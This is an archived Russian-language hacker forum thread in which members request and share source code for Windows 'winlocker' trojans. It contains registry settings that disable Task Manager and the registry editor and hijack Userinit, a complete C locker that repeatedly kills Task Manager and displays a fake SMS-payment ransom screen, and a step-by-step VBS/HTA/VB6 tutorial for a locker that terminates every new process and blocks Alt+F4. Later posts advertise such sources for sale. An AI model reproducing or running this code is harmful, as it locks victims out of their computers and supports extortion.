Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Исходники Троянов, блокирующих систему Windows

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Прочее] >> Исходники Троянов, блокирующих систему Windows
Имя
Сообщение << Старые топики   Новые топики >>
Исходники Троянов, блокирующих систему Windows - 2011-01-01 22:51:48.983333   
Scorpik

Сообщений: 113
Оценки: 0
Присоединился: 2011-01-01 22:33:00.310000
Всем доброго времени суток! Я думаю, что каждый ,когда нибудь, встречался с троянами, блокирующими систему  Windows. На данном форуме я предлагаю всем желающим выкладывать исходники таких вирусов. За одно сможем сами получше освоить и понять принцип написания таких "монстров" и других научить это делать!:)
Post #: 1
RE: Исходники Троянов, блокирующих систему Windows - 2011-01-02 23:27:42.940000   
[The]

Сообщений: 30
Оценки: 0
Присоединился: 2010-12-26 17:46:15.306666
Можно узнать, что такое криптованый исходник?
Post #: 2
RE: Исходники Троянов, блокирующих систему Windows - 2011-01-03 09:29:22.396666   
Scorpik

Сообщений: 113
Оценки: 0
Присоединился: 2011-01-01 22:33:00.310000
quote:

[The]
Извиняюсь , я описался)));)
Post #: 3
RE: Исходники Троянов, блокирующих систему Windows - 2011-01-06 10:51:28.570000   
manishka122

Сообщений: 25
Оценки: 0
Присоединился: 2010-06-25 11:36:02.580000
Какойже дурак даст школоте такого трояшу? Пусть школота учит делфи и пишет свои.

[OFFTOP]
quote:

ORIGINAL: Scorpik

quote:

[The]
Извиняюсь , я описался)))


Недержание это серьезная вещь..ты с этим не шути
[/OFFTOP]
Post #: 4
RE: Исходники Троянов, блокирующих систему Windows - 2011-01-06 12:07:55.243333   
Scorpik

Сообщений: 113
Оценки: 0
Присоединился: 2011-01-01 22:33:00.310000
manishka122  Я Турбо Паскаль учу))) Скоро си++ начну))) В инете я уже обыскался, нет исходников таких, если знаешь где посмотреть хотя бы 1 такой, то подскажи , написав мне в личку))) Буду очень благодарен! А так то я с вами полностью согласен!;) 
Post #: 5
RE: Исходники Троянов, блокирующих систему Windows - 2011-05-07 15:49:42.050000   
m0nstr

Сообщений: 58
Оценки: 0
Присоединился: 2010-08-30 19:11:36.590000
Исходником очень много, только их продают =) погуглите, за 300 р гдето видел недавно
Post #: 6
RE: Исходники Троянов, блокирующих систему Windows - 2011-05-08 16:59:04.690000   
xBuRoGoZx

Сообщений: 9
Оценки: 0
Присоединился: 2011-05-08 16:15:25.666666
Никто тебе не выложит в открытом доступе. Они есть, спору нет. Но они: на закрытых сайтах, где регистрация по приглашениям; платные; с ошибками. Представь хотя бы на секунду, что было бы, если бы исходники без ошибок, бесплатные и лежат на популярных общественных ресурсах. Это же будет апокалипсис. Ламеры будут все крушить и ломать. Даже те же самые инструкции по написанию бат-файлов в примерах вирусов содержат ошибки: где то / вместо \, где то % не написан, где то вместо О написана О (кириллицей)… Все опять таки от ламеров…
Post #: 7
RE: Исходники Троянов, блокирующих систему Windows - 2011-05-08 17:04:22.030000   
xBuRoGoZx

Сообщений: 9
Оценки: 0
Присоединился: 2011-05-08 16:15:25.666666
Никто тебе не выложит в открытом доступе. Они есть, спору нет. Но они: на закрытых сайтах, где регистрация по приглашениям; платные; с ошибками. Представь хотя бы на секунду, что было бы, если бы исходники без ошибок, бесплатные и лежат на популярных общественных ресурсах. Это же будет апокалипсис. Ламеры будут все крушить и ломать. Даже те же самые инструкции по написанию бат-файлов в примерах вирусов содержат ошибки: где то / вместо \, где то % не написан, где то вместо О написана О (кириллицей)… Все опять таки против ламеров… В принципе я себя считаю ламером. Но если бы мне попались исходники без ошибок и бесплатные, я бы не стал ничего крушить. А стал бы их изучать. Так что если хоть кто то имеет исходники.. Ну или хотя бы часть небольшую, напишите мне в ПМ. Очень интересно и хочу по изучать их.
Заранее благодарен.
Post #: 8
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-14 10:25:54.820000   
Scorpik

Сообщений: 113
Оценки: 0
Присоединился: 2011-01-01 22:33:00.310000
quote:

Но если бы мне попались исходники без ошибок и бесплатные, я бы не стал ничего крушить. А стал бы их изучать.
Молодой человек, я с вами полностью согласен. Вот именно по этой самой причине я и создавал этот форум. Не для того чтобы рушить , а для того чтобы изучать исходники подобных , можно сказать даже очень редких вирусов.
Post #: 9
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-14 12:51:52.596666   
ZiMMy

Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000

quote:

ORIGINAL: Scorpik

можно сказать даже очень редких вирусов.

Я бы так не сказал.
Post #: 10
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-14 13:53:30.240000   
KwanzaBot

Сообщений: 129
Оценки: 0
Присоединился: 2011-04-18 19:45:33.773333
Нужен просто винлокер или еще чтоб он как троян работал? Если просто winlock могу поделится сорцом собственного производства.
Post #: 11
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-14 22:14:32.680000   
ololo__schoolboy

Сообщений: 118
Оценки: 0
Присоединился: 2011-06-14 12:42:52.573333
Примитивный винлок будет примерно так устроен:

[Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
чтоб не редактировался реестор

[Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
чтоб диспетчер задач был заблокирован администратором

[Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"NoRealMode"=dword:00000001
чтоб не грузился в дос режиме

[Software\Microsoft\Windows\CurrentVersion\CurrentVersion\Winlogon]
"Userinit"="наш винлок"
чтоб грузился вместо юзер инит

KwanzaBot, делись, интересно
Post #: 12
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-15 09:35:09.870000   
KwanzaBot

Сообщений: 129
Оценки: 0
Присоединился: 2011-04-18 19:45:33.773333
Только в нём нету добавления в автозагрузку, и всё построено на костылях, но может кому пригодится)
И за корявый код простите, я где-то в 13-14 лет это писал.
#include "windows.h" #pragma comment(lib, "Gdi32.lib") #define IDB_BUTTON 200 #define IDB_EDIT 201 #define IDB_STATIC 202 int RegClass(WNDPROC Proc, LPCTSTR szName); LRESULT CALLBACK _export WndProc(HWND, UINT, WPARAM, LPARAM); HINSTANCE hInstance; HWND hEdit; HWND hwnd; void WinNull(int type) { HKEY lKey; //const char *zData = "00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00"; BYTE zData[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5B, 0xE0, 0x00, 0x00, 0x5C, 0xE0, 0x00, 0x00, 0x00, 0x00}; RegOpenKey(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Keyboard Layout", &lKey); if(type==1){ RegSetValueEx(lKey, "Scancode Map", 0, REG_BINARY, (LPBYTE)zData, sizeof(zData)); }else{ } RegCloseKey(lKey); } void SwitchNull(int type) { const char *pData = "0"; const char *eData = "1"; HKEY hKey; RegOpenKey(HKEY_CURRENT_USER, "Control Panel\\Desktop", &hKey); if(type==0){ RegSetValueEx(hKey, "CoolSwitch", 0, REG_SZ, (LPBYTE)pData, sizeof(pData)); }else{ RegSetValueEx(hKey, "CoolSwitch", 0, REG_SZ, (LPBYTE)eData, sizeof(pData)); } RegCloseKey(hKey); } DWORD WINAPI ThreadFunc(PVOID pParam) { DWORD dwResult = 0; while(1){ WinExec("taskkill /f /im taskmgr.exe", SW_HIDE); Sleep(60);} return dwResult; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { MSG msg; if(!RegClass(WndProc, "AppClass")) return FALSE; hwnd = CreateWindow("AppClass", "Ваш компьютер заблокирован", WS_MAXIMIZEBOX|WS_POPUP |WS_VISIBLE, CW_USEDEFAULT, CW_USEDEFAULT, 1280, 1024, NULL, NULL, hInstance, NULL); while (GetMessage(&msg, NULL, 0, 0)) { TranslateMessage(&msg); DispatchMessage(&msg); } return (int) msg.wParam; } int RegClass(WNDPROC Proc, LPCTSTR szName) { WNDCLASS wc; wc.style = CS_HREDRAW | CS_VREDRAW; wc.cbClsExtra = wc.cbWndExtra = 0; wc.lpfnWndProc = Proc; wc.hInstance = hInstance; wc.hIcon = LoadIcon(NULL, IDI_APPLICATION); wc.hCursor= LoadCursor(NULL, IDC_ARROW); wc.hbrBackground = (HBRUSH)(COLOR_BACKGROUND + 2); wc.lpszMenuName = (LPCTSTR)NULL; wc.lpszClassName = szName; return RegisterClass(&wc); } LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) { HWND hButton; HWND hStatic; switch(message) { case WM_CREATE: { //Logged(); //WinNull(1); //SwitchNull(0); HANDLE hThread = CreateThread(NULL, 0, &ThreadFunc, 0, 0, NULL); hButton = CreateWindow("BUTTON","ОК", WS_CHILD|WS_VISIBLE, 790,500,70,25,hWnd,(HMENU)IDB_BUTTON,hInstance,NULL); hEdit = CreateWindow("EDIT", NULL, WS_CHILD|WS_VISIBLE|WS_BORDER, 485,503,300,20,hWnd,(HMENU)IDB_EDIT,hInstance,NULL); hStatic = CreateWindow("STATIC", "Ваш компьютер заблокирован, для разблокировки пошлите sms с текстом бла бла на номер 0000 и введите полученный код в окно активации.", WS_CHILD|WS_VISIBLE, 485,445,375,51,hWnd,(HMENU)IDB_STATIC,hInstance,NULL); return 0; break; } case WM_COMMAND: { switch(LOWORD(wParam)) { case IDB_BUTTON:{ char word[256]; GetWindowText(hEdit,word,512); if(strcmp(word, "выход")==0){ SwitchNull(1); PostQuitMessage(0);} if(strcmp(word, "0000")==0) MessageBox(hwnd, "Простите, произошла ошибка сервиса, \nполучите пароль активации ещё раз.", "Ошибка!", MB_OK); } } break; } case WM_CLOSE:{ if((GetKeyState(VK_MENU) &gt;&gt; 8) && (GetKeyState(VK_F4) &gt;&gt; 8)) return 0; break; } case WM_PAINT:{ char psend[29] = "Ваш компьютер заблокирован!"; static PAINTSTRUCT ps; HDC hdc = BeginPaint(hwnd, &ps); LOGFONT f; f.lfCharSet = DEFAULT_CHARSET; f.lfPitchAndFamily = DEFAULT_PITCH; strcpy(f.lfFaceName, "Times New Roman"); f.lfHeight = 50; f.lfWeight = FW_BOLD; f.lfEscapement = 0; f.lfStrikeOut = 0; HFONT fOn = CreateFontIndirect(&f); HFONT fAn = (HFONT)SelectObject(hdc, fOn); SetTextColor(hdc, RGB(255, 255, 255)); SetBkColor(hdc, RGB(39, 90, 255)); SetTextAlign(hdc, TA_LEFT | TA_TOP); TextOut(hdc, 20, 20, psend, strlen(psend)); break; } case WM_DESTROY:{PostQuitMessage(0); return 0;}} return DefWindowProc(hWnd, message, wParam, lParam); }
Post #: 13
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-15 14:26:05.566666   
ololo__schoolboy

Сообщений: 118
Оценки: 0
Присоединился: 2011-06-14 12:42:52.573333
Изменяюсь за оффтоп, но все же не могу не спросить, вы перешли на си из javascript ?
Post #: 14
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-15 16:00:59.133333   
KwanzaBot

Сообщений: 129
Оценки: 0
Присоединился: 2011-04-18 19:45:33.773333
ololo__schoolboy, подозрительные вопрос 8|
jаvаsсript'ом ни когда не увлекался, а что?
Post #: 15
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-15 19:56:20.776666   
ololo__schoolboy

Сообщений: 118
Оценки: 0
Присоединился: 2011-06-14 12:42:52.573333
просто такая:if(...){ &nbsp;&nbsp; ... }else{ &nbsp;&nbsp; ... } нотация почти ни где не используется кроме javascript и java (насчет последнего не знаю)
Post #: 16
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-20 14:18:46.550000   
Scorpik

Сообщений: 113
Оценки: 0
Присоединился: 2011-01-01 22:33:00.310000
KwanzaBot, а у тебя нет  winlockа, написанного на паскале или делфи?

И выложенный тобою исходник, как я помимаю, написан на си++ ?

quote:

#include "windows.h" #pragma comment(lib, "Gdi32.lib") #define IDB_BUTTON 200 #define IDB_EDIT 201 #define IDB_STATIC 202 int RegClass(WNDPROC Proc, LPCTSTR szName); LRESULT CALLBACK _export WndProc(HWND, UINT, WPARAM, LPARAM); HINSTANCE hInstance; HWND hEdit; HWND hwnd; void WinNull(int type) { HKEY lKey; //const char *zData = "00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00"; BYTE zData[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5B, 0xE0, 0x00, 0x00, 0x5C, 0xE0, 0x00, 0x00, 0x00, 0x00}; RegOpenKey(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Keyboard Layout", &amp;lKey); if(type==1){ RegSetValueEx(lKey, "Scancode Map", 0, REG_BINARY, (LPBYTE)zData, sizeof(zData)); }else{ } RegCloseKey(lKey); } void SwitchNull(int type) { const char *pData = "0"; const char *eData = "1"; HKEY hKey; RegOpenKey(HKEY_CURRENT_USER, "Control Panel\\Desktop", &amp;hKey); if(type==0){ RegSetValueEx(hKey, "CoolSwitch", 0, REG_SZ, (LPBYTE)pData, sizeof(pData)); }else{ RegSetValueEx(hKey, "CoolSwitch", 0, REG_SZ, (LPBYTE)eData, sizeof(pData)); } RegCloseKey(hKey); } DWORD WINAPI ThreadFunc(PVOID pParam) { DWORD dwResult = 0; while(1){ WinExec("taskkill /f /im taskmgr.exe", SW_HIDE); Sleep(60);} return dwResult; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { MSG msg; if(!RegClass(WndProc, "AppClass")) return FALSE; hwnd = CreateWindow("AppClass", "Ваш компьютер заблокирован", WS_MAXIMIZEBOX|WS_POPUP |WS_VISIBLE, CW_USEDEFAULT, CW_USEDEFAULT, 1280, 1024, NULL, NULL, hInstance, NULL); while (GetMessage(&amp;msg, NULL, 0, 0)) { TranslateMessage(&amp;msg); DispatchMessage(&amp;msg); } return (int) msg.wParam; } int RegClass(WNDPROC Proc, LPCTSTR szName) { WNDCLASS wc; wc.style = CS_HREDRAW | CS_VREDRAW; wc.cbClsExtra = wc.cbWndExtra = 0; wc.lpfnWndProc = Proc; wc.hInstance = hInstance; wc.hIcon = LoadIcon(NULL, IDI_APPLICATION); wc.hCursor= LoadCursor(NULL, IDC_ARROW); wc.hbrBackground = (HBRUSH)(COLOR_BACKGROUND + 2); wc.lpszMenuName = (LPCTSTR)NULL; wc.lpszClassName = szName; return RegisterClass(&amp;wc); } LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) { HWND hButton; HWND hStatic; switch(message) { case WM_CREATE: { //Logged(); //WinNull(1); //SwitchNull(0); HANDLE hThread = CreateThread(NULL, 0, &amp;ThreadFunc, 0, 0, NULL); hButton = CreateWindow("BUTTON","ОК", WS_CHILD|WS_VISIBLE, 790,500,70,25,hWnd,(HMENU)IDB_BUTTON,hInstance,NULL); hEdit = CreateWindow("EDIT", NULL, WS_CHILD|WS_VISIBLE|WS_BORDER, 485,503,300,20,hWnd,(HMENU)IDB_EDIT,hInstance,NULL); hStatic = CreateWindow("STATIC", "Ваш компьютер заблокирован, для разблокировки пошлите sms с текстом бла бла на номер 0000 и введите полученный код в окно активации.", WS_CHILD|WS_VISIBLE, 485,445,375,51,hWnd,(HMENU)IDB_STATIC,hInstance,NULL); return 0; break; } case WM_COMMAND: { switch(LOWORD(wParam)) { case IDB_BUTTON:{ char word[256]; GetWindowText(hEdit,word,512); if(strcmp(word, "выход")==0){ SwitchNull(1); PostQuitMessage(0);} if(strcmp(word, "0000")==0) MessageBox(hwnd, "Простите, произошла ошибка сервиса, \nполучите пароль активации ещё раз.", "Ошибка!", MB_OK); } } break; } case WM_CLOSE:{ if((GetKeyState(VK_MENU) &gt;&gt; 8) &amp;&amp; (GetKeyState(VK_F4) &gt;&gt; 8)) return 0; break; } case WM_PAINT:{ char psend[29] = "Ваш компьютер заблокирован!"; static PAINTSTRUCT ps; HDC hdc = BeginPaint(hwnd, &amp;ps); LOGFONT f; f.lfCharSet = DEFAULT_CHARSET; f.lfPitchAndFamily = DEFAULT_PITCH; strcpy(f.lfFaceName, "Times New Roman"); f.lfHeight = 50; f.lfWeight = FW_BOLD; f.lfEscapement = 0; f.lfStrikeOut = 0; HFONT fOn = CreateFontIndirect(&amp;f); HFONT fAn = (HFONT)SelectObject(hdc, fOn); SetTextColor(hdc, RGB(255, 255, 255)); SetBkColor(hdc, RGB(39, 90, 255)); SetTextAlign(hdc, TA_LEFT | TA_TOP); TextOut(hdc, 20, 20, psend, strlen(psend)); break; } case WM_DESTROY:{PostQuitMessage(0); return 0;}} return DefWindowProc(hWnd, message, wParam, lParam); }

Post #: 17
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-20 21:00:52.413333   
KwanzaBot

Сообщений: 129
Оценки: 0
Присоединился: 2011-04-18 19:45:33.773333
Да нет, вроде как на Си.
Post #: 18
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-24 11:46:54.186666   
Scorpik

Сообщений: 113
Оценки: 0
Присоединился: 2011-01-01 22:33:00.310000
В этой статье я расскажу, как написать простенький локер, что называется, на коленке.
Наш локер будет состоять из 3-х файлов:
1. VBS-скрипта для убийства процессов.
2. Библиотеки для установки позиции окна HTML-приложения поверх всех окон.
3. HTML-приложения для растяжки во весь экран.
Ready - Steady - Go

Начнем с киллера процессов.
Открываем блокнот. Я использую Notepad++.
Пишем простенький код:
Dim objWMI, colMonitoredProcesses, objLatestProcess
Set objWMI = GetObject("winmgmts:\\.\Root\CIMV2")
Set colMonitoredProcesses = objWMI.ExecNotificationQuery("SELECT * FROM __InstanceCreationEvent " _
& "WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'")
Do
Set objLatestProcess = colMonitoredProcesses.NextEvent
objLatestProcess.TargetInstance.Terminate()
Loop
Set objLatestProcess = Nothing
Set colMonitoredProcesses = Nothing

Сохраняем с расширением VBS.
Скрипт каждую секунду мониторит появление процессов и убивает свежие.
Можете попробовать запустить. Предварительно рекомендую запустить диспетчер задач, для того, чтобы благополучно убить процесс wsсriрt.exe.
После запуска скрипта запустить дистпетчер задач не получится. Становится понятно для чего он нам нужен :).

Продолжаем. Зачем нам понадобилось писать библиотеку?
Из VBS получить дескриптор окна не реально, а он нам очень нужен для того, чтобы установить позицию окна поверх всех окон, поэтому создадим так называемый Wrapper - библиотеку, которая поможет нам использовать API-функции из скрипта.
Для получения хэндла используем функцию FindWindow из библиотеки user32.dll, для установки позиции окна поверх всех - функцию SetWindowPos, а для запрета использования клавиатурного сочетания Alt+F4 - функцию RegisterHotKey из той же библиотеки.
Открываем IDE VB6, создаем проект ActiveX DLL, называем проект WinLocker, класс - WLClass, пишем несложный код:
Option Explicit
'API-функция получения дескриптора окна
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
(ByVal lpszClassName As String, ByVal lpszWindow As String) As ****
'API-функция установки позиции окна
Private Declare Function SetWindowPos Lib "user32" _
(ByVal hWnd As ****, ByVal hWndInsertAfter As ****, ByVal x As ****, _
ByVal y As ****, ByVal cx As ****, ByVal cy As ****, ByVal wFlags As ****) As ****
'API-функция определения горячих кнопок
Private Declare Function RegisterHotKey Lib "user32" _
(ByVal hWnd As ****, ByVal id As ****, ByVal fsModifiers As ****, _
ByVal vk As ****) As ****

'получаем дескриптор
Public Function GetHandle(ByVal strCaption As String) As ****
GetHandle = FindWindow(vbNullString, strCaption)
End Function

'устанавливаем окно поверх всех
Public Sub SetTop(ByVal strCaption As String)
SetWindowPos FindWindow(vbNullString, strCaption), -1, 0, 0, 0, 0, 3
End Sub

'запрещаем использование Alt+F4
Public Sub DenyAltF4(ByVal strCaption As String)
RegisterHotKey FindWindow(vbNullString, strCaption), 99, 1, &H73
End Sub

Комплируем DLL. Библиотека готова к использованию.

Завершаем. Пишем HTA.
Открываем блокнот. Пишем код:
<html>
<head>
<title>VBSWinlocker</title>
<HTA:APPLICATION
ID="VBSWinlocker"
APPLICATIONNAME="VBSWinlocker"
SINGLEINSTANCE="yes"
showInTaskbar ="no"
BORDER="none"
SCROLL="no"
Version = "1.0"
/>
<style type="text/css">
body{
color:#fff;
font: bold sans-serif;
}
#center{
position: absolute;
left: 42%;
top: 48%;
}
.button{
font: bold;
color:#fff;
background-color:000055;
}
</style>
</head>
<sсriрt language="VBScript">
Const strDll = "WinLocker.dll" 'библиотека
Const strWLProsMon = "WLProcKiller.vbs" 'киллер процессов
Const strInputVal = "12345" 'код разблокировки

'процедура изменения размера главного окна при загрузке
Sub Window_OnLoad()
Window.MoveTo 0, 0
Window.ResizeTo screen.availWidth, screen.availHeight
'чтобы при любом раскладе загрузился интерфейс
Window.setTimeout "SetTopPos",1, "vbsсriрt"
End Sub

Sub SetTopPos()
Set wshShell = CreateObject("WScript.Shell")
'пытаемся зарегистрировать библиотеку
ret = wshShell.Run("regsvr32.exe /i /s " & strDll & ",0,True")
'проверяем успех регистрации
If ret <> 0 Then 'если не удалось зарегистрировать
wshShell.PopUp ,1,"Не удалось зарегистрировать библиотеку " & strDll ,16
Set wshShell = Nothing
Window.Close
End If

'запускаем киллера процессов
ret = wshShell.Run("wsсriрt.exe " & strWLProsMon)
'проверяем успех запуска киллера
If ret <> 0 Then 'если не удалось запустить скрипт мониторинга
wshShell.PopUp ,1,"Не удалось запустить " & strWLProsMon,16
Set wshShell = Nothing
Window.Close
End If
Set wshShell = Nothing

'создаем экземпляр класса из либы = strDll
Set objDASetTop = CreateObject("WinLocker.WLClass")
'делаем окно поверх всех окон
objDASetTop.SetTop document.title
'запрещаем нажатие Alt+F4
objDASetTop.DenyAltF4 document.title
'удаляем ссылку
Set objDASetTop = Nothing
End Sub

'останавливаем киллера процессов
Sub StopMon()
Dim objWMI, colProcess, objProcess
Set objWMI = GetObject("winmgmts:\\.\Root\CIMV2")
'ищем процесс мониторинга
Set colProcess = objWMI.ExecQuery("Select * from Win32_Process Where Name ='wsсriрt.exe' And CommandLine Like '%" & _
strWLProsMon & "%'")
For Each objProcess in colProcess 'побежали по полученным процессам
objProcess.Terminate 'убиваем процесс
Next
Set objWMI = Nothing
End Sub

'проверка значения
Sub CheckInputVal()
If txtPW.Value = strInputVal Then
StopMon 'останавливаем мониторинг процессов
Window.Close 'закрываем приложение
End If
End Sub



</sсriрt>

<!– Подключаем таблицы стилей –>
<!– <link href="usbmaster.css" rel="stylesheet" type="text/css" media="screen" /> –>
<!– Рисуем нарядную градиентную заливку :) –>
<body STYLE="filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=1, StartColorStr='#000066', EndColorStr='#0000FF')">
<div id="center">
<input type="password" id="txtPW">
<input type="button" class="button" value="ввод" onclick="CheckInputVal">
<br/>
Код: 12345
</div>
</body>
</html>

Не трудно догадаться, что:
SINGLEINSTANCE="yes" - запрещает одновременный запуск одноименных HTA
showInTaskbar="no" - запрещает отображение приложения в панели задач
BORDER="none" - убирает границу окна приложения
SCROLL="no" - убирает скролл

Сохраняем файл с расширением HTA.

Наш локер готов. Что получилось можно скачать здесь.

PS: Не пытайтесь "допиливать" полученый код с целью противозаконного использования :).

Респект Автору dab00 !!!
Post #: 19
RE: Исходники Троянов, блокирующих систему Windows - 2012-04-02 11:03:42.813333   
Rammsteinik

Сообщений: 12
Оценки: 0
Присоединился: 2012-03-17 21:29:42.676666
продам исходники винлока. вот пример http://lost4.ucoz.ru/WinLock.exe
Post #: 20
RE: Исходники Троянов, блокирующих систему Windows - 2012-04-02 11:05:54.710000   
Rammsteinik

Сообщений: 12
Оценки: 0
Присоединился: 2012-03-17 21:29:42.676666
продам исходники винлока. вот пример http://lost4.ucoz.ru/WinLock.exe
Post #: 21
RE: Исходники Троянов, блокирующих систему Windows - 2012-04-02 21:03:48.720000   
shkolote attake

Сообщений: 268
Оценки: 0
Присоединился: 2010-10-19 05:37:44.873333
а что за массив байт?
Post #: 22
Страниц:  [1]
Все форумы >> [Прочее] >> Исходники Троянов, блокирующих систему Windows







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.